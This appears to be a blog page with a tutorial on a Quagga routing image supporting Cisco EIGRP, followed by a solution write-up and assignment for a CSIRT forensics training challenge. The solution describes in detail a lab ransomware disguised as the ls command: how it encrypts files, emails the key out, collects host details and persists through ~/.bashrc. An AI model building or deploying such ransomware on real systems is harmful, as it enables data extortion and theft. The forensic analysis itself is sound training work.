In May 2013, Cisco opened its proprietary EIGRP protocol and released an informational RFC 7868 - Cisco's Enhanced Interior Gateway Routing Protocol (EIGRP). It gives other vendors an opportunity to implement EIGRP protocol into their devices. A group students led by an assistant professor and Cisco CCIE Peter Paluch who is an instructor trainer at the Faculty of Management Science and Informatics, University of Zilina, Slovakia implemented EIGRP support into Quagga routing software.

The goal of this tutorial is to provide a VMware vmdk disk with installed Linux Core and Quagga which supports Cisco EIGRP protocol. The image can be used to test compatibility between EIGRP configured on native Cisco devices and an implementation of EIGRP daemon in Quagga . I also share my findings about issues that I have noticed during my tests.

Here you can download Linux Core vmdk disk with installed Quagga 0.99.24-rc1 which supports EIGRP.

How did I create Quagga Qemu Image with EIGRP Support
I installed Linux Core 7.2 to Qemu virtual machine and remastered Core for sending output to a serial port according to this tutorial. I download Quagga version which supports EIGRP from github and I installed it from source. Afterwards I created Linux Core Quagga extension. I did not submit Quagga extension to Tinycore repository for following reasons. Firstly, EIGRP daemon has not been yet merged to the main branch of Quagga. A current Quagga version with EIGRP support on released on github is based on the old Quagga version 0.99.24-rc1. Secondly, Zebra daemon responsible for putting routes into Linux routing table occasionally does not install received routes although routes are presented in EIGRP topology table.

Finally I installed Core extensions such as tcpdump, ipv6, netfilter etc. and enabled forwarding IPv4 and IPv6 packets between interfaces. The list of installed extensions can be checked with the command:

$ ls /mnt/sda1/tce/optional/

Routing daemons are started during the boot of Core Linux. They are placed in a start-up file /opt/boot/bootlocal.sh. Comment a line for a particular routing daemon if you do not need it. The list of running daemons and ports are shown in the file below.

root@box:/home/tc# netstat -atpn | grep 0.0.0.0 > ports.txt

Testing Topology Description
The are three routers are running inside GNS3 project. A router eigrp-core-1 x86-64 is Linux Core 7.2 with Quagga compiled for EIGRP support. Routers vIOS-1 and v-IOS-2 are Cisco Virtual IOS L3 routers. The Qemu emulator is used as a hypervisor for all routers.

Picture1_Network_Topology

Picture 1 - Network Topology

The list of used software is available here.

Configuration
To configure EIGRP, telnet to eigrp daemon running on port 2609. Password configured in the EIGRP configuration file /usr/local/etc/quagga/eigrpd.conf is set to quagga.

tc@box:~$ telnet localhost 2609

Configuration files for router are eigrp-core-1.txt, vIOS-1, vIOS-2.txt.

To save Quagga and vIOS routers' configuration, type the write command from privileged exec mode. Each routing daemon has it own file.
/usr/local/etc/quagga/eigrpd.conf
/usr/local/etc/quagga/zebra.conf

To save configuration change stored inside a configuration file own by a particular routing daemon, run a script below. The script is responsible for saving all files located in a directory /usr/local/etc/quagga. This is a requirement of Linux Core .

tc@box:~$ /usr/bin/filetool.sh -b

Note: To save an another file or a directory, simply add the path to a file /opt/.filetool.lst and run the command /usr/bin/filetool.sh -b.

Issues

1. EIGRP configuration is not correctly implemented in Quagga Vtysh shell
Even the command router eigrp is presented in the configuration mode of Quagga vtysh, the EIGRP daemon configuration is not properly implemented in vtysh. Here is the prove.

2. Zebra does not install received routes
Sometimes Zebra does not install received routes into a Core Linux routing table. However routes are presented in EIGRP Topology Table.

Picture2_Linux_Routing_Table

Picture 2 - Missing Received Routes in Linux Routing Table

The picture below proves that routes are presented in EIGRP Topology Table.

Picture3_EIGRP_Topology_Table

Picture 3 - Routes are Presented in EIGRP Topology Table

I noticed this issue is always happening when EIGRP daemon is started right after Zebra daemon during the Core boot. As a workaround I postponed starting EIGRP daemon about 20 seconds in /opt/bootlocal.sh. But sometimes routes are not inserted to a Linux routing table. Below are EIGRP debugs captured on vIOS-1 router and captured EIGRP traffic on Linux Core. The router vIOS-2 is switched off but a network 10.10.2.0/24 is presented in a routing table of vIOS-1 as interface Gi0/1 is up/up state due to using an Qemu emulator.

a) EIGRP debugs on vIOS-1 when routes are installed into Linux routing table

In this case, Zebra successfully installs received routes in to to Core Linux routing table. Notice that once EIGRP neighbor adjacency between Quagga (10.10.1.1) and vIOS-1 (10.10.1.2) is established, Quagga restart EIGRP neighbor adjacency for unknown reason. After restart, adjacency is again established between EIGRP peers. I made about 20 tests and I realized that routes are inserted to Linux routing table only when Quagga restarts EIGRP neighbor adjacency.

Click on the command to show captured debug on vIOS-1 when received routes are installed in a Linux Core routing table.

vIOS-1# debug ip eigrp
vIOS-1# debug ip eigrp notifications
vIOS-1# debug ip eigrp neigbour

b) EIGRP debugs on vIOS-1 when routes are not installed into Linux routing table

vIOS-1# debug ip eigrp unsuccesfull
vIOS-1# debug ip eigrp notifications
vIOS-1# debug ip eigrp neighbour

Conlusion
EIGRP support in  Quagga routing software is still in development. They are some the bugs presented but they will be resolved in the future. Thanks to great effort of Slovak students, EIGRP in Linux have become a reality.

 

Forensics Challenge for CSIRT Team - Part 2 Solution

The goal of the tutorial is to provide a solution to the forensic challenge game that I created for testing forensic skills of CSIRT team. Please be careful and run a suspicious binary file located inside a provided virtual machine only in a secured environment in order to avoid unwanted damage or loss.

As you can notice, some files are being encrypted right after boot of a virtual machine. All these files have suffix .enc001. You can easily located them with the command:

$ find / -name "*.enc001" -type f 2>/dev/null

There is also a file named encryption_warning.txt located in a home directory of an actual user and it contains a following warning message.
*** Your files have been encrypted! ***
*** To decrypt them, run '/usr/local/bin/ls %1a%your_decryption_key ***

Without any doubts a utility ls is not a cryptography tool so it is a good place where we can start our investigation. The command /usr/local/bin/ls -la  shows files in a actual directory.

ubuntu@ubuntu:~$ /usr/local/bin/ls -la

Picture1-ls_Command_Existing_File

Picture 1 - Content of  Actual Directory

The output looks good. But what does happen if we display a non-existing file kdkdkdkdk?

ubuntu@ubuntu:~$ /usr/local/bin/ls kdkdkdkdk

Picture2-ls_Command_Non-Existing_File

Picture 2 - Two Error Messages

They are two interesting facts shown in the output of the command /usr/local/bin/ls . Firstly, two error messages are presented in the output. Normally, the ls command shows only one error message. Secondly, a utility /bin/ls is used instead of /usr/local/bin/ls.  It seems that they are two ls utilities presented in the file system. We can prove the existence of two ls utilities with whereis command.

ubuntu@ubuntu:~$ whereis ls
ls: /bin/ls /usr/local/bin/ls /usr/share/man/man1/ls.1.gz

The command which gives us an answer to the question which ls binary is run when command ls is entered.

ubuntu@ubuntu:~$ which ls
/usr/local/bin/ls

Our /usr/local/bin utility is a 64 bit binary file, statically linked. As far as we have known the command /usr/local/bin/ls starts the utility /bin/ls when it is entered and it can also decrypts certain type of files.

ubuntu@ubuntu:~$ file /usr/local/bin/ls
/usr/local/bin/ls: ELF 64-bit LSB executable, x86-64, version 1 (GNU/Linux), statically linked, for GNU/Linux 2.6.32, BuildID[sha1]=83648a4b8d193e7b48eaba0ab4caf02463b04557, stripped

We are going to run a binary file /usr/local/bin/ls as a background process and immediately kill it sending a signal segmentation fault to the process. As a result, a core dump is created in the directory /var/crash.

ubuntu@ubuntu:~$ /usr/local/bin/ls & ( kill -SIGSEGV "$!" )

Further investigation of a core dump reveals that a Bash script is located inside the core dump. I wrote a script extract_script.sh which extracts the script from a core dump.

ubuntu@ubuntu:~$ ./extract_script.sh

Picture3-Extracting_Script

Picture 3 - Using Extracting Script to Extract Bash Script From Core Dump

The extracted Bash script is a ransomware which is compiled and obfuscated with a utility shc. The script has following features:

  • Script uses an email client - swaks for sending an encryption key to an email address abdullah.khan@vfemail.net. The client authenticates itself with the account john.white@unseen.is. Thanks to using email address john.white@unseen.is for sending a key and the email address abdullah.khan@vfemail.net for receiving a key, the attacker can still use information sent to the second email address when a password for the first email address stored in /usr/local/bin/ls binary is revealed.
  • Script downloads swaks from the Internet and stores it to ~/.vim directory as a hidden file named .sender.
  • If a key is not successfully sent for some reason, the script tries to resend the key stored in ~/.bashrc, every time a command /usr/local/bin is entered until the key is successfully sent.
  • Script uses OpenSSL with AES 256 encryption algorithm to encrypt files with the encryption key length 32 characters.
  • Separate OpenSSL process is started and sent to background to encrypt different type of users' files (txt, html, jpg etc.) in order to speed up an encryption process.
  • If an encryption process is interrupted (computer is rebooted etc.), the script continues encrypting files with a key stored in ~/.bashrc, when /usr/local/bin command is entered.
  • Only if an encryption key is successfully sent to the email address abdullah.khan@vfemail.net and encryption is finished, the script deletes a key from a file ~/.bashrc.
  • If a script cannot locate OpenSSL in a file system, it downloads it here. The script saves it to the ~/.vim directory as hidden file named .updater.
  • Script masks its real function starting a "real" /bin/ls command when a fake /usr/local/bin/ls command is entered. The script delivers the maximum four arguments it receives from user's input to the /bin/ls command.
  • Script can both encrypt and decrypt users' files. Only if a pattern %1a% plus a correct decryption key is entered together with /usr/local/bin/ls command, the script starts a decryption process. If a provided key is wrong, the script just calls /bin/ls command.

Functions and Body of Script
The script consists of the following functions.

  • insbshrc -insert either an encryption key or a keyword Sent=0 to ~/.bashrc.
  • clean - removes a key and a keyword Sent=0 from ~/.bashrc, deletes files from /tmp that contain the list of files being encrypted and deletes swaks  (~/.vim/.sender).
  • checkwget - checks if  either wget or curl exists.
  • checkopenssl - if OpenSSL is not found, the OpenSSL binary is downloaded from here and  saved ( ~/.vim/.updater).
  • sendkey - Perl email client is downloaded from the Internet and saved (~/.vim/.sender). If sending is successful a function insbshrc is called. The function inserts a keyword Sent=0 to ~/.bashrc. The function sendkey also collects and sends info about hostid, a public IP address, MAC addresses of Ethernet cards and a list of partitions from /etc/fstab  together with the encryption key.
  • encall - searches for particular files in a file system and starts functions checkwget, checkopenssl, insbshrc, functions for encrypting files and finally the function clean. It also creates file /tmp.X1-lock after successful encryption. For each type files selected for encryption a background process.
  • decall - decrypts encrypted files with a provided key and creates a file /tmp/.X2-lock. It also calls  checkwget and checkopenssl functions to ensure that OpenSSL binary is available in a file system.
  • showls - calls either /bin/ls or /usr/bin/ls with maximum four arguments entered by user.

The body of the script performs following actions:

  • checks if either /bin/ls or /usr/bin/ls exist. If not, scripts exits.
  • checks if a file ~/.bashrc exists in a user home directory.
  • stores script arguments and  number of arguments to variables.
  • checks if arguments contain a string %1a% (if yes, decryption is started).
  • checks if alias ls --color=auto is configured in ~/.bashrc.
  • checks if thy are running instances of ls command. If there is more than one instance running and we are not decrypting, the script calls function showls and exits. This prevents encryption to start while previous encryption is still in progress.
  • If arguments contain the string %1a%, the script extracts an encryption key from arguments. If a hidden file /tmp/.X2-lock does not exists, the script calls a function decall (decryption function).
  • Based on presence of the file /tmp/.X1-lock, presence of an encryption key and a keyword Sent=0 in a file ~/.bashrc, the script takes different actions. For instance, if arguments do not contain string %1a%, the script calls a function showls and do following:
    • if a file /tmp/.X1-lock does no exist and an encryption key is not found in ~/.bashrc, we are going to generate a new key, encrypt files and send key (k=11).
    • if a file /tmp/.X1-lock exists and the key is found in ~/.bashrc, we are only going to send the key found in ~/.bashrc and no encryption is done (k=00).
    • if a file /tmp/.X1-lock does not exist, yhe key is found in ~/.bashrc and a keyword Sent=0 is not found in ~/.bashrc, we are going to encrypt with the old key and send the key (k=101).
    • if a file /tmp/.X1-lock does not exist, the key is found in ~/.bashrc. and a keyword Sent=0 is found in ~/.bashrc, we are going only encrypt files without sending the key (k=100).
    • if a file /tmp/.X1-lock exists and a key is not found in ~/.bashrc we are going to do  nothing (k=01).

Files Created by Ransomware
Below is the list of files that script creates.

  • /tmp/.X1-lock - represents a time stamp for encryption. If the file exists, the script knows that encryption process is finished.
  • /tmp/.X2-lock - represents a time stamp for decryption. If the file exists, the script knows that decryption process is finished.
  • The script searches for files based on to their suffix and stores a result of its findings to these files:
    • /tmp/.doc.bak, /tmp/.docx.bak, /tmp/.txt.bak, /tmp/.xls.bak, /tmp/.xlsx.bak, /tmp/.ppt.bak, /tmp/.pptx.bak, /tmp/.odt.bak, /tmp/.pdf.bak, /tmp/.accdb.bak, /tmp/.html.bak, /tmp/.php.bak, /tmp/.jpg.bak, /tmp/.bmp.bak, /tmp/.gif.bak, /tmp/.png.bak

Analysis of Captured Network Traffic
A network traffic generated by a function sendkey is captured here. Packets number 5 and 6 are DNS query requests sent to the DNS server with IP address 10.10.10.1 to translate a domain name ipinfo.io. Packets packets 7 and 8 are DNS responses sent by the DNS server. The server returns IP addresses 52.59.56.117 and 52.58.152.182 as a response for the domain ipinfo.io. A web page http://ipinfo.io (52.59.56.117) provides a public IP address of host and its connected user-agent. A TCP three way handshake between web server with the IP address 52.59.56.117 and client 10.10.10.217 is shown in the packets 9-11.  In a packet number 14, the server sends response 200 OK with the public IP address of the host 195.146.158.174 as a response to HTTP GET request  http://ipinfo.io/ip.

Packets 21-24 are DNS request/replies for a domain mail.unseen.is. A DNS response returns IP address 82.221.107.99 for this domain. A TCP 3 way handshake between IPs 10.10.10.217 and 82.221.107.99 is captured in packets 25-27. In packet number 28, the server sends SMTP response code 220 (service ready) with a response parameter - domain mt02.unseen.is. In 30th packet, ESMTP client (swaks) sends EHLO (extended HELLO) command  to the mail server. We can see a hostname of the host - osboxes.  In packet number 32, the mail server responds with code 250 (success) with multiple response parameters.

  • PIPELINING - Command pipelining
  • SIZE -Message size declaration
  • VRFY - Verify user name
  • ETRN - Extended version of remote message queue starting command TURN
  • STARTTLS - Transport layer security
  • ENHANCEDSTATUSCODES
  • 8BITMIME - 8 bit data transmission
  • DSN - Delivery status notification

SMTP client sends TLS command to the email server inside the packet 33. The server responds with a response code 220 and a respond parameter - 2.0.0 ready to start TLS.  Then the client and the server exchange TLS Client and Server Hello messages in packets  35 and 37. The server selects cipher suite (TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384) and a compression method (null) in its Server Hello message sent to the client. Then the server sends its certificate to the client inside a packet 43. The server and client exchange their keys in packets 44 and 46. TLS handshake is finished in a packet 47 and encrypted application data start to flow begging with a packet 48. Communication between the client and the mail server is finished in a packet 75.

Known Issues
Swaks is configured to use TLS encryption during sending a key. If Perl has no a module Net::SSLeay installed, sending does not occur. As a result,  a network traffic is not generated and the script keeps the key in ~/.bashrc.

You can install Net::SSLeay module with the command.

$ sudo apt-get install libnet-ssleay-perl
$ sudo apt-get install libcrypt-ssleay-perl

Alternative Solution for Decrypting SHC Files
There is BASH script UnSHC available on github which decrypts binary files created by SHC. I was able to recreate ls BASH script with the UnSHc version 0.7.

$ wget https://github.com/yanncam/UnSHc/archive/master.zip
$ unzip UnSHc-master.zip
$ cp UnSHc-master/latest/unshc.sh .
$ ./unshc.sh ls -o script_decrypted.sh

The file script_descrypted.sh contains an original BASH  script.

End.

 

Forensics Challenge for CSIRT Team - Part 1 Assignment

I have created a virtual machine that you can use to test your forensics analysis skills. Please, download the VM, solve an assignment below and share solutions with us.

1. Assignment
Your are a member of the elite CSIRT team which is responsible for dealing with computer security incidents in your jurisdiction. You are asked to investigate a server that was previously administered by disgruntled administrator Mr. Abdullah Khan who was fired up. The login credentials for the server were changed after Khan's sacking from the company but it is believed that he might insert malicious software into server before changing of credentials. Your task is to ensure that a sever does not contain any malicious software and user data stored on the server are not compromised. You also need to prove your professional forensic skills and analyze a suspicious file in case you will find it on the server. Based on your investigation you should find out how malware work and create detailed report for your boss.

The server is running Ubuntu 16.04.1 and it is primary used as a file server with configured SSH access. Unfortunately the backup of user files is damaged and cannot be used in case of data are lost during your investigation. The login/password is ubuntu/ubuntu and root/root.

2. Terms of  Use

  1. Any use of the software located inside the provided virtual machine is at your own risk and it is intended for learning purpose only.
  2.  Use of software for malicious purpose is strictly prohibited.
  3.  You further acknowledge and agree that I am not responsible or liable, directly nor indirectly, for any damage or loss caused or alleged to be caused by or in connection with use of any software located inside the provided virtual machine.